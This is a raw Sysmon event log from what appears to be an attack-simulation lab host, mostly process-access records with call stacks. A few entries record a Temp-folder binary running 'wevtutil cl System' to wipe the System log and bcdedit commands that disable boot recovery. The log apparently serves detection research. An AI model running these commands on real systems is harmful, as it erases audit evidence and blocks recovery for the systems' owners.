10:56:42.498{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000290262Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:42.498{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000290261Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:42.498{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000290260Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:42.498{C8EA50B7-F11F-6215-1000-000000003802}3641580C:\Windows\system32\svchost.exe{C8EA50B7-12EA-6216-5F05-000000003802}5592C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000290259Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:42.498{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000290258Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:42.498{C8EA50B7-F11F-6215-1000-000000003802}3641376C:\Windows\system32\svchost.exe{C8EA50B7-12EA-6216-5F05-000000003802}5592C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000290257Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:42.498{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000290256Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:42.498{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000290255Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:42.498{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000290254Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:42.482{C8EA50B7-12EA-6216-5F05-000000003802}55925112C:\Windows\system32\conhost.exe{C8EA50B7-12EA-6216-5E05-000000003802}6688C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000290253Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:42.482{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000290252Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:42.482{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000290251Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:42.482{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000290250Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:42.482{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000290249Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:42.465{C8EA50B7-F2AA-6215-B100-000000003802}22443360C:\Windows\system32\csrss.exe{C8EA50B7-12EA-6216-5F05-000000003802}5592C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000290248Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:42.445{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-12EA-6216-5F05-000000003802}5592C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000290247Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:42.445{C8EA50B7-F2AA-6215-B100-000000003802}22444896C:\Windows\system32\csrss.exe{C8EA50B7-12EA-6216-5E05-000000003802}6688C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000290246Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:42.445{C8EA50B7-12E9-6216-4E05-000000003802}68686944C:\Users\ADMINI~1\AppData\Local\Temp\_tbl.exe{C8EA50B7-12EA-6216-5E05-000000003802}6688C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9278(wow64)|C:\Windows\System32\KERNELBASE.dll+d7f5c(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\_tbl.exe+10af|C:\Users\ADMINI~1\AppData\Local\Temp\_tbl.exe+179b|C:\Users\ADMINI~1\AppData\Local\Temp\_tbl.exe+193c|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 154100x8000000000000000290245Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:42.452{C8EA50B7-12EA-6216-5E05-000000003802}6688C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c wevtutil.exe cl SystemC:\Temp\ATTACKRANGE\Administrator{C8EA50B7-F2AC-6215-B31E-0B0000000000}0xb1eb32HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{C8EA50B7-12E9-6216-4E05-000000003802}6868C:\Users\ADMINI~1\AppData\Local\Temp\_tbl.exe"C:\Users\ADMINI~1\AppData\Local\Temp\_tbl.exe" 10341000x8000000000000000290244Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:42.445{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-12EA-6216-5E05-000000003802}6688C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000290243Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:42.429{C8EA50B7-12EA-6216-5B05-000000003802}3405828C:\Windows\system32\conhost.exe{C8EA50B7-12EA-6216-5D05-000000003802}5956C:\Windows\system32\bcdedit.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000290242Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:42.429{C8EA50B7-F2AA-6215-B100-000000003802}22442592C:\Windows\system32\csrss.exe{C8EA50B7-12EA-6216-5D05-000000003802}5956C:\Windows\system32\bcdedit.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000290241Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:42.429{C8EA50B7-12EA-6216-5A05-000000003802}5172844C:\Windows\system32\cmd.exe{C8EA50B7-12EA-6216-5D05-000000003802}5956C:\Windows\system32\bcdedit.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+c347|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000290240Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:42.429{C8EA50B7-12EA-6216-5D05-000000003802}5956C:\Windows\System32\bcdedit.exe10.0.14393.4770 (rs1_release.211101-1440)Boot Configuration Data EditorMicrosoft® Windows® Operating SystemMicrosoft Corporationbcdedit.exebcdedit /set {default} recoveryenabled noC:\Temp\ATTACKRANGE\Administrator{C8EA50B7-F2AC-6215-B31E-0B0000000000}0xb1eb32HighMD5=5639B10AF2E2A56F54A63A7BF1553EED,SHA256=999C9F92E914F69E278FD684E5DB5AECD16A01C324DF2FF351BCF041E3B4019A,IMPHASH=640CFCF7F00029D52EF0C4D45E2E87A6{C8EA50B7-12EA-6216-5A05-000000003802}5172C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no 10341000x8000000000000000290239Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:42.414{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000290238Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:42.414{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{00000000-0000-0000-0000-000000000000}5956C:\Windows\system32\bcdedit.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000290237Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:42.414{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000290236Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:42.414{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000290235Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:42.414{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000290234Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:42.414{C8EA50B7-12EA-6216-5B05-000000003802}3405828C:\Windows\system32\conhost.exe{C8EA50B7-12EA-6216-5C05-000000003802}4176C:\Windows\system32\bcdedit.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000290233Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 